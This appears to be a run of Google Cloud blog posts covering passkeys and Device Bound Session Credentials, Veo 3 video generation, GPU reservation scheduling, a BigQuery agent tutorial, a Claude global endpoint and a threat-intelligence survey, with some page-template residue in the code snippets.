To empower users and customers against identity-based attacks, we’ve introduced two critical innovations developed in close partnership with the wider security community: passkeys and Device Bound Session Credentials (DBSC). These advancements are designed to significantly strengthen account security and prevent account takeovers.
We highly recommend that all Workspace customers, especially those with high-value users such as IT administrators and business leaders, implement these controls.
Use passkeys for a simpler, more secure sign-in
We have made passkeys generally available to all 11 million Workspace organizations and billions of Google consumer users. Passkeys represent a fundamental shift away from passwords, offering a simpler and inherently more secure sign-in experience.
Unlike traditional passwords that can be guessed, stolen, and forgotten, passkeys are unique digital credentials cryptographically tied to your device. They use the robust FIDO2 technology, the same underlying standard used in hardware security keys like our Titan Security Key, and the added convenience of using a device you already own, such as an Android phone or a Windows laptop.
While absolute security remains an elusive goal, from the perspective of account takeover and phishing attacks, passkeys and security keys virtually eliminate these password-based threats. As a founding member and steadfast supporter of the FIDO Alliance, we are encouraged by the growing industry adoption of FIDO technology.
Disrupt cookie theft with Device Bound Session Credentials
We are also addressing the use of infostealers to exfiltrate session cookies, allowing attackers to bypass password and 2FA controls and access victim accounts from their own devices.
In addition to Mandiant’s M-Trends 2025 report, IBM’s 2025 X-Force Threat Intelligence Index observed an 84% increase in emails delivering infostealers in 2024 compared to the prior year.
In close collaboration with the Chrome team, we are adding a powerful addition to our security arsenal, now in beta: Device Bound Session Credentials (DBSC). DBSC are designed to disrupt cookie theft by creating an authenticated session that is cryptographically bound to a specific device. This innovative approach can significantly mitigate the risk of exfiltrated cookies being used to access accounts from an unauthorized device.
DBSC introduces a new API that enables servers to establish an authenticated session bound to a device. When a session is initiated, the browser generates a unique public-private key pair. The private key is securely stored using hardware-backed storage, such as a Trusted Platform Module (TPM), when available.
The browser then issues a regular session cookie. It is crucial to note that throughout the session’s lifetime, the browser periodically proves possession of the private key and refreshes the session cookie.
This mechanism allows the cookie’s lifetime to be set short enough to render stolen cookies largely useless to attackers. While DBSC currently operates with Chrome and Workspace, numerous server providers, identity providers (IdPs) like Okta, and other browsers such as Microsoft Edge, have expressed strong interest in adopting DBSC to protect their users from cookie theft.
A combined approach for enhanced security
Combined, passkeys and DBSC can empower organizations to significantly strengthen account security and prevent account takeovers. Both of these security controls are readily available to all Workspace customers, and we strongly advocate for their implementation, particularly for your most critical users such as IT administrators and business leaders.
<ListValue: [StructValue([(‘title’, ‘Join the Google Cloud CISO Community’), (‘body’, <wagtail.rich_text.RichText object at 0x3e4f91e34ca0>), (‘btn_text’, ‘Learn more’), (‘href’, ‘https://rsvp.withgoogle.com/events/ciso-community-interest?utm_source=cgc-blog&utm_medium=blog&utm_campaign=2024-cloud-ciso-newsletter-events-ref&utm_content=-&utm_term=-‘), (‘image’, <GAEImage: GCAT-replacement-logo-A>)])]>
In case you missed it
Here are the latest updates, products, services, and resources from our security teams so far this month:
Secure cloud. Insecure use. (And what you can do about it): If the cloud is secure, why are there still cloud security breaches? Too many organizations don’t use it securely. Here’s how to change that. Read more.
Tabletopping the tabletop: New perspectives from cybersecurity’s favorite role-playing game: A group of bio-cybersecurity experts did a TTX with us to practice and share ideas on how to respond to real-world challenges — without the real-world risk. Read more.
How to enable Secure Boot for your AI workloads: Secure Boot can help protect AI from the moment GPU-accelerated workloads power up. Here’s how to use it on Google Cloud. Read more.
Too many threats, too much data: new survey. Here’s how to fix that: Operationalizing threat intelligence remains a major challenge, say security and IT leaders in a new survey. Here are the survey results, and four steps security teams can take to get more out of their threat intelligence data. Read more.
Your guide to Google Cloud Security at Black Hat USA 2025: We’re excited to bring our commitment to cybersecurity innovation and simplification to Black Hat. Here’s where to find us, and what we’ll be talking about. Read more.
How SUSE and Google Cloud collaborate on Confidential Computing: Secure sensitive data on Google Cloud using SUSE Linux Enterprise Server (SLES) and Confidential VMs with AMD SEV, AMD SEV-SNP, and Intel TDX. Read more.
Innovate with Confidential Computing: Attestation, Live Migration on Google Cloud: Confidential Computing has evolved rapidly since we first made it available. See what’s new with two key pillars: robust attestation and live migration. Read more.
Introducing OSS Rebuild: Open source, rebuilt to last: OSS Rebuild is a new project to strengthen trust in open-source package ecosystems that can give security teams powerful data to avoid compromise without burden on upstream maintainers. Read more.
We’re taking legal action against the BadBox 2.0 botnet: Recently, our researchers partnered with HUMAN Security and Trend Micro to uncover BadBox 2.0, the largest known botnet of internet-connected TVs. Building on our previous actions to stop these cybercriminals, we filed a lawsuit in New York federal court against the botnet’s perpetrators. Read more.
Please visit the Google Cloud blog for more security stories published this month.
aside_block
<ListValue: [StructValue([(‘title’, ‘Tell us what you think’), (‘body’, <wagtail.rich_text.RichText object at 0x3e4f91e34880>), (‘btn_text’, ‘Vote now’), (‘href’, ‘https://www.linkedin.com/feed/update/urn:li:activity:7356020693123145729/’), (‘image’, <GAEImage: GCAT-replacement-logo-A>)])]>
Threat Intelligence news
Exposing the risks of VMware vSphere Active Directory integration: The common practice of directly integrating vSphere with Microsoft Active Directory can simplify administration tasks, but also creates an attack path frequently underestimated due to misunderstanding the inherent risks. Read more.
Defending your VMware vSphere estate from UNC3944: Take a deep dive into the anatomy of UNC3944’s vSphere-centered attacks, and study our fortified, multi-pillar defense strategy for risk mitigation. Read more.
Ongoing SonicWall SMA exploitation campaign using the OVERSTEP backdoor: Google Threat Intelligence Group (GTIG) has identified an ongoing campaign by a suspected financially-motivated threat actor we track as UNC6148, targeting fully patched end-of-life SonicWall Secure Mobile Access (SMA) 100 series appliances. Read more.
Update on creative phishing attack on prominent academics and critics of Russia: We detailed two distinct campaigns in June observing a Russia state-sponsored cyber threat actor targeting prominent academics and critics of Russia, and impersonating the U.S. State Department. The threat actor is continuing the initial wave of their campaign with changed ASP names while also trying a new tactic: sending calendar invites in an attempt to convince targets to link an attacker-controlled device to their Microsoft Office 365 account through Microsoft’s device code authentication flow. Read more.
Please visit the Google Cloud blog for more threat intelligence stories published this month.
Now hear this: Podcasts from Google Cloud
How to accelerate your SIEM journey: Manija Poulatova, director, Security Engineering and Operations, Lloyd’s Banking Group, joins hosts Anton Chuvakin and Tim Peacock for a lively chat on all things SIEM, from migration challenges to AI integration. Listen here.
Governing AI agents, from code to courtroom: The autonomous decision-making and learning capability promise of agentic AI and AI agents presents a unique set of risks across various domains. Anna Gressel, partner at Paul, Weiss, discusses her key areas of concern with Anton and guest host Marina Kaganovich. Listen here.
Cyber-Savvy Boardroom: Harnessing innovation while mastering compliance: Grant Waterfall, partner, PwC, joins Office of the CISO’s Alicja Cade and David Homovich with a deep-dive chat on using compliance to drive innovation. Listen here.
Behind the Binary: A reverse engineer’s journey: Reverse-engineering pioneer Danny Quist talks with host Josh Stroschein about the evolving landscape of binary analysis tools, the constant battle with malware obfuscation, and building one of the first malware repositories for research. Listen here.
To have our Cloud CISO Perspectives post delivered twice a month to your inbox, sign up for our newsletter. We’ll be back in a few weeks with more security-related updates from Google Cloud.
Veo 3 has seen massive global adoption with over 70 million videos created since May, and we’ve seen tremendous momentum with our enterprise customers as well. Since its preview launch on Vertex AI in June, enterprise customers have already generated over 6 million videos, showcasing the incredible demand for professional-grade, scalable AI video creation.
Today, we’re building on this momentum with some exciting updates to Veo on Vertex AI.
Veo 3, our most advanced video generation model, is now generally available to everyone on Vertex AI.
Veo 3 Fast, a model designed for speed and rapid iteration, is now generally available for everyone on Vertex AI. It’s a faster way to turn text to video, from narrated product demos to short films.
Coming to public preview on Vertex AI in August, Veo 3 and Veo 3 Fast will also offer image-to-video capabilities to make it possible for you to bring static visuals and images to life. All you have to do is provide the source image along with a text prompt that describes what kind of video you want to create.
How businesses are building with Veo 3 on Vertex AI
Google Cloud customers around the world are using Veo 3 and Veo 3 Fast on Vertex AI to create professional-quality video content with unparalleled efficiency and creative freedom. Let’s look at some examples.
Canva– the design platform used by millions of people worldwide – uses Veo to make it easy for users to create videos for marketing, social media, and more.
“Enabling anyone to bring their ideas to life – especially their most creative ones – has been core to Canva’s mission ever since we set out to empower the world to design. By democratising access to a powerful technology like Google’s Veo 3 inside Canva AI, your big ideas can now be brought to life in the highest quality video and sound, all from within your existing Canva subscription. In true Canva fashion, we’ve built this with an intuitive interface and simple editing tools in place, all backed by Canva Shield.” – Cameron Adams, co-founder and Chief Product Officer, Canva
But the momentum extends beyond design. The team at BarkleyOKRP, a leading ad agency, is using Veo 3 to speed up video production timelines.
“The rapid advancements from Veo 2 to Veo 3 within such a short time frame on this project have been nothing short of remarkable. Our team undertook the task of re-creating numerous music videos initially produced with Veo 2 once Veo 3 was released, primarily due to the significantly improved synchronization between voice and mouth movements. The continuous daily progress we are witnessing is truly extraordinary.” – Julie Ray Barr, Senior Vice President Client Experience, BarkleyOKRP
At global investing platform eToro, the team is making marketing iterations a breeze with Veo 3.
“At eToro, innovation is in our DNA. As a global investing platform serving clients in 75 countries, local storytelling isn’t optional – it’s essential. With Veo 3, we produced 15 fully AI‑generated versions of our ad, each in the native language of its market, all while capturing real emotion at scale. Ironically, AI didn’t reduce humanity – it amplified it. Veo 3 lets us tell more stories, in more tongues, with more impact.” – Shay Chikotay, Head of Creative & Content, eToro
Razorfish, an interactive agency and part of the Publicis Groupe, is using Veo to bring creative to life.
“For The Morelandos, our campaign with Visit Orlando and Google, we used the full Vertex AI stack—Gemini to mine real reviews, Imagen to bring the characters to life, and Veo to give them motion. Veo let us go from story to near-cinematic video in a fraction of the usual time—which meant more room to explore, iterate, and push the idea further.” – Anthony Yell, Chief Creative Officer, Razorfish
Synthesia, a leading synthetic media generation company, is using Veo to contextually adapt visuals to its hyper-realistic AI avatars and voices.
“Veo 3 represents a leap forward in generative AI, and its integration into Synthesia’s platform will redefine how businesses create video content. By combining our hyper-realistic AI avatars and voices with Veo-powered fully contextual visuals that adapt to each unique story, we’re giving enterprise teams the creative power to communicate with unrivalled clarity and impact.” – Bill Leaver, Product Manager, Synthesia
How enterprises can use Veo 3 Fast for speed and creativity
Veo 3 Fast is a great fit for work that requires rapid iteration and speed. It has an ideal balance between processing time and high-quality visual output, making it especially helpful for:
Quickly generating and testing variations of ad concepts to respond to market trends.
Efficiently creating video demonstrations for entire product catalogs from still images.
Developing engaging animated explainers and training modules in less time.
Veo 3 and Veo 3 Fast on Vertex AI mean even more capabilities for enterprise storytelling
Veo 3 and Veo 3 Fast are designed to give creators the control and quality needed to move beyond short clips and produce complete, compelling narratives. Here are some of the core features now generally available on Vertex AI.
Create scenes with native audio: Veo 3 generates video and audio in a single step. This means you can create scenes with characters that speak with accurate lip-syncing, and sound effects that fit the mood.
Prompt: Talking to the barista from across the counter, a woman in a coffee shop places an order for a cup of coffee with cream and sugar, and a chocolate croissant. The barista listens to the order, responds sure 🙂 and then turns to the commercial espresso machine that is behind him. The woman patiently waits across the counter as her order is being prepared by the barista.
Deliver professional quality at enterprise scale: Veo 3 produces high-definition (1080p) video, suitable for professional marketing campaigns, product demonstrations, and internal communications. You can create content that meets brand standards, saving time and money.
Prompt: An eye-level shot, zooming in on a photorealistic scene of a person sculpting a pot on a pottery wheel in a well lit pottery studio.
Simplify content localization for global audiences: Veo 3’s native dialogue generation helps businesses connect with an international audience by producing a video once and localizing the dialogue for dozens of languages.
Prompt: An eye-level shot of a confident young woman in a dark floral halter-neck dress standing on a stone bridge with the Eiffel Tower softly blurred in the background. Her dark hair and the fabric of her dress flutter gently in the wind as the light subtly changes around her. The distant hum of city traffic fills the air. She says out loud: La confiance est mon accessoire préféré. Cette robe vient juste après.
Image-to-video (coming to public preview on Vertex AI in August): Veo 3 and Veo 3 Fast can also take a single image, which can be a photo you uploaded or an AI-generated image, and animate it, creating an 8-second video clip. This feature is particularly powerful for content creators, marketers, and businesses looking to animate existing visual assets, create engaging social media content, or generate compelling product demonstrations from high-quality images.
Prompt: The artist continues to work as the camera pans around showing a shop full of stained glass creations.
Enterprise-grade safety and security
Veo 3 and Veo 3 Fast on Vertex AI are built for scalable and responsible enterprise use. We embed digital watermarks into every frame with SynthID, helping combat misinformation and misattribution. Veo 3 and Veo 3 Fast are also covered by ourindemnity for generative AI services.
Get started with Veo 3 and Veo 3 Fast today
To get started, go here to learn more about Veo 3 and Veo 3 Fast on Vertex AI, and try it on Vertex AI Media Studio.
Organizations need ML compute resources that can accommodate bursty peaks and periodic troughs. That means the consumption models for AI infrastructure need to evolve to be more cost-efficient, provide term flexibility, and support rapid development on the latest GPU and TPU accelerators.
Calendar mode is currently available in preview as the newest feature of Dynamic Workload Scheduler. This mode provides short-term ML capacity — up to 90 days of reserved capacity — without requiring long-term commitments.
Calendar mode extends the capabilities of Compute Engine future reservations to provide co-located GPU and TPU capacity that’s a good fit for model training, fine-tuning, experimentation and inference workloads.
Similar to a flight or hotel booking experience, Calendar mode makes it easy to search for and reserve ML capacity. Simply define your resource type, number of instances, expected start date and duration, and in a few seconds, you’ll be able to see the available capacity and reserve it. Once the capacity reservation is confirmed and delivered to your project, you can consume it via Compute Engine, Google Kubernetes Engine (GKE), Vertex AI custom training, and Google Batch.
What customers are saying
Over the past year, early access customers have used Calendar mode to reserve ML compute resources for a variety of use cases, from drug discovery to training new models.
“To accelerate drug discovery, Schrödinger relies on large-scale simulations to identify promising, high-quality molecules. Reserving GPUs through Google Cloud’s DWS Calendar Mode provides us the crucial flexibility and assurance needed to cost-effectively scale our compute environment for critical, time-sensitive projects.” – Shane Brauner, EVP/CIO, Schrödinger
“For Vilya, Dynamic Workload Scheduler has delivered on two key fronts: affordability and performance. The cost efficiency received was a significant benefit, and the reliable access to GPUs has empowered our teams to complete projects much faster, and it’s been invaluable for our computationally intensive tasks. It’s allowed us to be more efficient and productive without breaking the budget.” – Patrick Salveson, co founder and CTO
“Databricks simplifies the deployment and management of machine learning models, enabling fine tuning and real-time inference for scalable production environments. DWS Calendar Mode alleviated the burden of GPU capacity planning and provided seamless access to the latest generation GPU hardware for dynamic demand for testing and ongoing training.” – Ravi Gadde, Sr. Director, Serverless Platform
Using Calendar mode
With these concepts and use cases under our belts, let’s take a look at how to find and reserve capacity via the Google Cloud console. Navigate to Cloud console -> Compute Engine -> Reservation. Then, on the Future Reservation tab, click Create a Future Reservation. Selecting a supported GPU or TPU will expose the Search for capacity section as shown below.
Proceed to the Advanced Settings to determine if the reservation should be shared across multiple projects. The final step is to name the reservations upon creation.
The reservation is approved within minutes and can be consumed once it is in the Fulfilled status at the specified start time.
Get started today
Calendar mode with AI Hypercomputer makes finding, reserving, consuming, and managing capacity easy for ML workloads. Get started today with Calendar mode for TPUs. Contact your account team for GPU access in Compute Engine, GKE, or Slurm. To learn more see Calendar mode documentation and Dynamic Workload Scheduler pricing.
As the excitement around AI agents reaches enterprise customers, a critical question emerges: How can we empower these agents to securely and intelligently interact with enterprise data systems like Google Cloud BigQuery?
Currently, the developers building agentic applications have been forced to build and maintain their own custom tools, a process that is slow, risky, and distracts from building innovative applications. This introduces considerable development overhead and risk, as they become responsible for everything from authentication and error handling to keeping pace with BigQuery’s evolving capabilities.
To solve this, we are introducing a new, first-party toolset for BigQuery that includes tools to fetch metadata and execute queries (and we have more on the way):
list_dataset_ids: Fetches BigQuery dataset ids present in a GCP project.
get_dataset_info: Fetches metadata about a BigQuery dataset.
list_table_ids: Fetches table ids present in a BigQuery dataset.
get_table_info: Fetches metadata about a BigQuery table.
execute_sql: Runs a SQL query in BigQuery and fetch the result.
These official, Google-maintained tools provide a secure and reliable bridge to your data, and you can use them in two powerful ways: a built-in toolset in Google’s Agent Development Kit (ADK)or through the flexible, open-source MCP Toolbox for Databases. This frees you to focus on creating value, not on building foundational plumbing.
In this post, we’ll explore these first-party tools for BigQuery and walk you through how they can be used to build a conversational analytics agent in ADK that can answer natural language questions.
Tutorial: Build a Conversational Analytics Agent using BigQuery’s first-party tools
Our agent will query BigQuery’s public dataset: thelook_ecommerce, a synthetic e-commerce dataset that includes customer details, product inventories, and order histories. The agent’s primary role will be to generate SQL queries and provide meaningful responses to common business questions, such as: What are the top-selling products? Which products are frequently ordered together? And how many customers do we have in Colombia?
If you’re new to ADK, this page provides an overview of its core concepts and components; otherwise, let’s dive in!
Choose your model, select Vertex AI as the backend, and confirm your project id and region:
You should now have a new folder named bq-agent-app. Navigate to agent.py and update the root LLM-Agent to reflect our conversational analytics agent:
code_block
<ListValue: [StructValue([(‘code’, ‘root_agent = Agent(rn model=”gemini-2.0-flash”,rn name=”bigquery_agent”,rn description=(rn “Agent that answers questions about BigQuery data by executing SQL queries”rn ),rn instruction=””” You are a data analysis agent with access to several BigQuery tools. Make use of those tools to answer the user’s questions.rnrn “””,rn tools=[bigquery_toolset],rn)’), (‘language’, ‘lang-py’), (‘caption’, <wagtail.rich_text.RichText object at 0x3e0fdb7fb0d0>)])]>
When defining your agent, you provide a unique name, specify the underlying LLM model, and can optionally include a description that helps other agents understand its purpose. The agent’s core task or goal is defined in the instructions.
Finally, to enable the agent to interact with your data, it must be equipped with tools that allow it to interact with BigQuery so it can understand the available datasets and tables, and of course, execute queries. Let’s consider our options when it comes to using BigQuery’s first-party toolset.
Option 1: Use ADK’s new built-in toolset for BigQuery
This first-party toolset is owned and maintained by Google. To assign these tools to your agent, you need to import the BigQueryToolset from the agents.tools module and then initialize the toolset:
code_block
<ListValue: [StructValue([(‘code’, ‘from google.adk.tools.bigquery import BigQueryCredentialsConfigrnfrom google.adk.tools.bigquery import BigQueryToolsetrnimport google.authrnrn# Define an appropriate credential typernCREDENTIALS_TYPE = AuthCredentialTypes.OAUTH2rnrn# Write modes define BigQuery access control of agent:rn# ALLOWED: Tools will have full write capabilites.rn# BLOCKED: Default mode. Effectively makes the tool read-only.rn# PROTECTED: Only allows writes on temporary data for a given BigQuery session.rnrnrntool_config = BigQueryToolConfig(write_mode=WriteMode.ALLOWED)rnrnif CREDENTIALS_TYPE == AuthCredentialTypes.OAUTH2:rn # Initiaze the tools to do interactive OAuthrn credentials_config = BigQueryCredentialsConfig(rn client_id=os.getenv(“OAUTH_CLIENT_ID”),rn client_secret=os.getenv(“OAUTH_CLIENT_SECRET”),rn )rnelif CREDENTIALS_TYPE == AuthCredentialTypes.SERVICE_ACCOUNT:rn # Initialize the tools to use the credentials in the service account key.rn creds, _ = google.auth.load_credentials_from_file(“service_account_key.json”)rn credentials_config = BigQueryCredentialsConfig(credentials=creds)rnelse:rn # Initialize the tools to use the application default credentials.rn application_default_credentials, _ = google.auth.default()rn credentials_config = BigQueryCredentialsConfig(rn credentials=application_default_credentialsrn )rnrnbigquery_toolset = BigQueryToolset(credentials_config=credentials_config, tool_filter=[rn’list_dataset_ids’,rn’get_dataset_info’,rn’list_table_ids’,rn’get_table_info’,rn’execute_sql’,rn ])’), (‘language’, ‘lang-py’), (‘caption’, <wagtail.rich_text.RichText object at 0x3e0fdb7fb5b0>)])]>
You can use the tool_filter parameter to filter the tools you’d like to expose to the agent.
Provide an OAuth 2.0 client_id and secret. This approach is typically used when an application needs a user to grant it permission to access their BigQuery data.
For more granular control over your interaction with BigQuery, you can of course create your own custom function tools, which are implemented as Python functions that you expose to your agent.
When tools are implemented directly within an agent, even with built-in toolsets, the agent or application is responsible for managing its authentication to BigQuery, as well as the logic and implementation for each tool. Thistight coupling creates challenges: updates to a tool or changes in its BigQuery connection method will require manual modification and redeployment for every agent, which can lead to inconsistencies and maintenance overhead.
Option 2: Use BigQuery’s pre-built tools in MCP Toolbox for Databases
The MCP (Model Context Protocol) Toolbox for Databases is an open-source server that centralizes the hosting and management of toolsets, decoupling agentic applications from direct BigQuery interaction. Instead of managing tool logic and authentication themselves, agents act as MCP clients, requesting tools from the Toolbox. The MCP Toolbox handles all the underlying complexities, including secure connections to BigQuery, authentication and query execution.
This centralized approach simplifies tool reuse across multiple agents, streamlines updates (tool logic can be modified and deployed on the Toolbox without requiring changes to every agent), and provides a single point for enforcing security policies.
Want to host your own custom tools in MCP Toolbox for Databases?
You can define your own custom tools in SQL within atools.yaml configuration file and provide the –tools-file option when starting your server. You cannot, however, use the --prebuilt and –tools-file option together. If you want to use custom tools alongside prebuilt tools, you must use the –tool-file option and manually specify the prebuilt tools you want to include in the configuration file, like so.
To connect your ADK application to the MCP Toolbox for Databases, you need to install toolbox-core:
Assign either the built-in ADK toolset, or the MCP toolset to your agent, and you’re ready to go!
code_block
<ListValue: [StructValue([(‘code’, ‘root_agent = Agent(rn model=”gemini-2.0-flash”,rn name=”bigquery_agent”,rn description=(rn “Agent that answers questions about BigQuery data by executing SQL queries”rn ),rn instruction=””” You are a data analysis agent with access to several BigQuery tools. Make use of those tools to answer the user’s questions.rn “””,rn tools=[bigquery_toolset]rn)’), (‘language’, ”), (‘caption’, <wagtail.rich_text.RichText object at 0x3e0fdb7fb9d0>)])]>
You can now run your agent using the adk run or adk web command and start asking questions about your data!
Your agent will leverage pre-built tools to extract dataset metadata, and then generate and execute a SQL query in BigQuery to retrieve your result:
Get started
Dive into these tutorials and start building your conversational analytics agent today:
Anthropic’s Claude models on Vertex AI now have improved overall availability with the global endpoint for Claude models. Now generally available, the global endpoint unlocks the ability to dynamically route your requests to any region with available capacity supported by the Claude model you’re using. This helps you deploy Claude-powered applications and agents with more uptime and dependability.
During the preview period, customers like Replicate experienced firsthand the benefits of the global endpoint. Zeke Sikelianos, founding designer at Replicate noted, “people use Replicate because they want to deploy AI models at scale. Claude on Vertex AI fits perfectly with that — we get one of the best language models available, with Google’s solid infrastructure and the global endpoint that delivers fast responses worldwide. It just works.”
The global endpoint is launching with support for pay-as-you-go traffic for the following Claude models:
Claude Opus 4
Claude Sonnet 4
Claude Sonnet 3.7
Claude Sonnet 3.5 v2
What are global endpoints and when should you use them?
When you send a request to Anthropic’s Claude models on Vertex AI, you typically specify a region (e.g., us-central1). This is a regional endpoint, which keeps your data and processing within that geographical boundary—ideal for applications with strict data residency requirements.
The global endpoint, by contrast, does not tie your request to a single region. Instead, it directs traffic to a global entry point that dynamically routes your request to a region with available capacity. This multi-region approach is designed to maximize availability and reduce errors that can arise from high traffic in a given region.
So, when is the global endpoint the right choice?
If your application requires the highest possible availability and your data is not subject to residency restrictions, the global endpoint is an excellent fit.
If your services are facing regional capacity limits or if you are architecting for maximum resilience against regional disruptions.
However, if you have data residency requirements (specifically for ML processing), you should continue to use regional endpoints, as the global endpoint does not guarantee that requests will be processed in any specific location. Here’s a simple breakdown of global versus regional endpoints:
Global versus regional endpoint
Global endpoint
Regional endpoint
Availability
Maximized by leveraging multi-region resources
Dependent on single-region capacity and quota
Latency
May be higher in some cases due to dynamic global routing
Optimized for low latency within the specified region
Quota
Uses a separate, independent global quota
Uses the quota assigned to the specific region
Use case
High-availability applications without data residency needs.
Applications with strict data residency requirements
Traffic type
Pay-as-you-go
Pay-as-you-go & Provisioned Throughput (PT)
By giving you the choice between global and regional endpoints, Vertex AI empowers you to build more sophisticated, resilient, and scalable generative AI applications and agents that meet your specific architectural and business needs.
Prompt caching and pay-as-you-go pricing
As part of this launch, prompt caching is fully supported with global endpoints. When a prompt is cached, subsequent identical requests will be routed to the region holding the cache for the lowest latency. If that region is at capacity, the system will automatically try the next available region to serve the request. This integration ensures that users of global endpoints still receive the benefits of prompt caching (lower latency and lower costs).
Note that at this point, the global endpoint for Claude models only supports pay-as-you-go traffic. Provision throughput is available on regional-endpoints only.
Global endpoint requests are charged the same price as regional endpoint requests.
Best practices
To get the most out of this new feature, we recommend routing your primary traffic to the global endpoint. Use regional endpoints as a secondary option, specifically for workloads that must adhere to data residency rules. To ensure the best performance and avoid unnecessary cost, please do not submit the same request to both a global and a regional endpoint simultaneously.
A new, separate global quota is available for this feature. You can view and manage this quota on the “Quotas & Systems Limits” page in your Google Cloud console and request an increase if needed. The pricing for requests made to the Global Endpoint remains the same as for regional endpoints.
How to get started
To get started with the global endpoint for Anthropic’s Claude models on Vertex AI, There are only two steps:
Step 1: Select and enable a global endpoint supported Claude model on Vertex AI (Claude Opus 4, Claude Sonnet 4, Claude Sonnet 3.7, Claude Sonnet 3.5 v2).
Step 2: In the configuration, set “GLOBAL” as the location variable value, and use global endpoint cURL:
code_block
<ListValue: [StructValue([(‘code’, ‘https://aiplatform.googleapis.com/v1/projects/PROJECT_ID/locations/global/publishers/PUBLISHER_NAME/models/MODEL_NAME’), (‘language’, ”), (‘caption’, <wagtail.rich_text.RichText object at 0x3e0fd978b520>)])]>
An overwhelming volume of threats and data combined with the shortage of skilled threat analysts has left many security and IT leaders believing that their organizations are vulnerable to cyberattacks and stuck in a reactive state.
That’s according to the new Threat Intelligence Benchmark, a commissioned study conducted by Forrester Consulting on behalf of Google Cloud, on the threat intelligence practices of more than 1,500 IT and cybersecurity leaders from eight countries and across 12 industries.
Operationalizing threat intelligence remains a major challenge, said a majority of the survey’s respondents.
“Rather than aiding efficiency, myriad [threat intelligence] feeds inundate security teams with data, making it hard to extract useful insights or prioritize and respond to threats. Security teams need visibility into relevant threats, AI-powered correlation at scale, and skilled defenders to use actionable insights, enabling a shift from a reactive to a proactive security posture,” said the study.
Data and analytical challenges organizations face in improving their threat intelligence capabilities.
Organizations today face a multifaceted, compound problem: They have too few analysts who can effectively interpret and act on threat intelligence, who are facing too many data feeds supplying that raw intelligence. This has led many security and IT leaders to worry that they are missing critical needles in the haystack, ultimately making it harder to take action against legitimate cyberattacks.
82% of respondents worry about missing threats due to the amount of alerts and data they are faced with.
We believe the key is to embed threat intelligence directly into security workflows and tools, so it can be accessed and analyzed quickly and effectively. AI has a vital role in this integration, helping to synthesize the raw data, manage repetitive tasks, and reduce toil to free human analysts to focus their efforts on critical decision-making.
aside_block
<ListValue: [StructValue([(‘title’, ‘Get the new Threat Intelligence Benchmark study’), (‘body’, <wagtail.rich_text.RichText object at 0x3e29ac56b7c0>), (‘btn_text’, ‘Download now’), (‘href’, ‘https://cloud.google.com/resources/content/security-forrester-harness-ai-transform-threat-intelligence?utm_source=cgc-blog&utm_medium=blog&utm_campaign=FY25-Q3-GLOBAL-ENT35910-website-dl-dgcsm-CTI-Study-80198&utm_content=-&utm_term=-‘), (‘image’, None)])]>
Key takeaways from the survey
Organizations value threat intelligence: More than 80% of organizations already use threat intelligence or are planning to across eight major use-cases.
Improving threat intelligence capabilities is challenging: Too many feeds (61%), too few analysts (60%), hard to derive clear action from threat intelligence data (59%), and difficulty determining which threats are valid (59%) were cited as the top challenges to actioning threat intelligence. All told, 82% are concerned about missing threats due to the volume of alerts and data.
Organizational blind spots:80% of respondents said their senior leadership team underestimates threats to the organization, and 66% state that they struggle to share threat intelligence with relevant teams.
Stuck in reactive mode: Too much data leaves security teams struggling to prioritize threats, creating significant security gaps. As a result, 86% of respondents said that their organization needs to improve its understanding of the threat landscape, 85% of respondents say that their organization could focus more time and energy on emerging critical threats, and 72% of respondents said they are mostly reactive to threats.
Helping defenders with AI:86% of respondents agreed that they “must” use AI to improve their ability to operationalize threat intelligence. When asked about the benefits of using AI in threat intelligence, improving efficiency by generating easy-to-read summaries was cited most frequently (69%).
Organizations are using AI to help in a number of ways including summarization, prioritization, and communication.
The Threat Intelligence Benchmark study underscores how complex the problem is, but we also see a path forward for even under-resourced organizations to get the most out of their threat intelligence. Through our engagements with customers and the broader threat intelligence community, we’ve developed suggestions on how organizations can maximize the resources they’ve already dedicated to threat intelligence.
How to operationalize threat intelligence more effectively
At Google Cloud, we’re strong advocates for security and IT leaders to integrate threat intelligence into their security environments as part of a comprehensive layered defense. The raw data of threat intelligence can be used to prevent, detect, and respond to attacks — as well as to inform broader strategic decision-making across the organization.
Here are four tactical steps to help you get started.
Step 1: Identify high-stakes intelligence needs
Security teams should use threat intelligence as a strategic tool to focus on the threats that are most relevant to their organization. It can be crucial in shaping the organization’s cyber threat profile (a structured way to identify, analyze, and prioritize potential cyber threats,) and help to better protect against the threats that matter most.
Define your crown jewels: Identify your most critical assets, data, and business functions, and calculate the impact if they’re compromised. This directly informs your Priority Intelligence Requirements (PIR).
Know your adversaries: Pinpoint the threat actors most likely to target your IT environment and the industry that your organization operates in. Study their common tactics, techniques, and procedures (TTPs). Focus on intelligence related to these groups and their methods of intrusion.
Establish a feedback loop: Regularly ask your incident response (IR) and security operations center (SOC) teams about the threat intelligence that could have helped them prevent, detect, and respond faster to recent incidents. Their answers can be used to refine PIRs.
Understand how security enables the organization: Developing robust threat intelligence analysis is all about supporting smarter, faster decisions. Security should be a close partner to leadership and other teams, focused on enabling the organization to achieve its goals while minimizing risk.
Step 2: Build a tactical threat intelligence pipeline
In cybersecurity, efficiency is key. The goal is to get threat intelligence from source to action as quickly as possible.
Centralized aggregation: Implement a Threat Intelligence Platform (TIP) and use existing security information and event management (SIEM) capabilities to ingest, normalize, and de-duplicate threat intelligence from all sources (OSINT, commercial feeds, ISACs, dark web monitoring).
Automated enrichment: Automatically enrich incoming indicators (IPs, domains, hashes) with context such as geolocation, reputation scores, and associated threat actors. Tools should do the heavy lifting.
Prioritization engine: Instead of letting analysts manually triage thousands of alerts, develop rules in your TIP and SIEM to automatically score and prioritize intelligence based on its relevance to PIRs and its severity.
Direct integration with controls: Push relevant, high-fidelity indicators and detection rules directly to firewalls and proxies, endpoint and extended detection and response (EDR and XDR), Intrusion detection and prevention systems (IDS and IPS), and SIEM systems.
Step 3: Empower security teams
Two important ways that IT and security professionals can feel that the threat intelligence they’re using is helpful are freeing analysts from toil, and focusing on training and tooling.
Analyst focus: Free up your SOC and IR analysts from data ingestion and basic correlation. Their time is better spent on proactive threat hunting, contextualizing alerts, developing custom detections, and augmenting incident response.
Training and expertise: 79% of survey respondents said that external threat intelligence providers should help “uplevel junior staff or embed a threat intelligence (CTI) analyst” into their team. Give analysts focused training on shifting to a more intelligence-led approach and providing threat intel expertise tailored to your organization.
Step 4: Measure and adapt continuously
Threat intelligence operationalization is an ongoing cycle, not a one-time project.
Key metrics: Track these key threat intelligence metrics and ask the following questions for each:
Mean time to detect (MTTD) and mean time to respond (MTTR) reduction: Does threat intelligence help us detect and respond to threats faster?
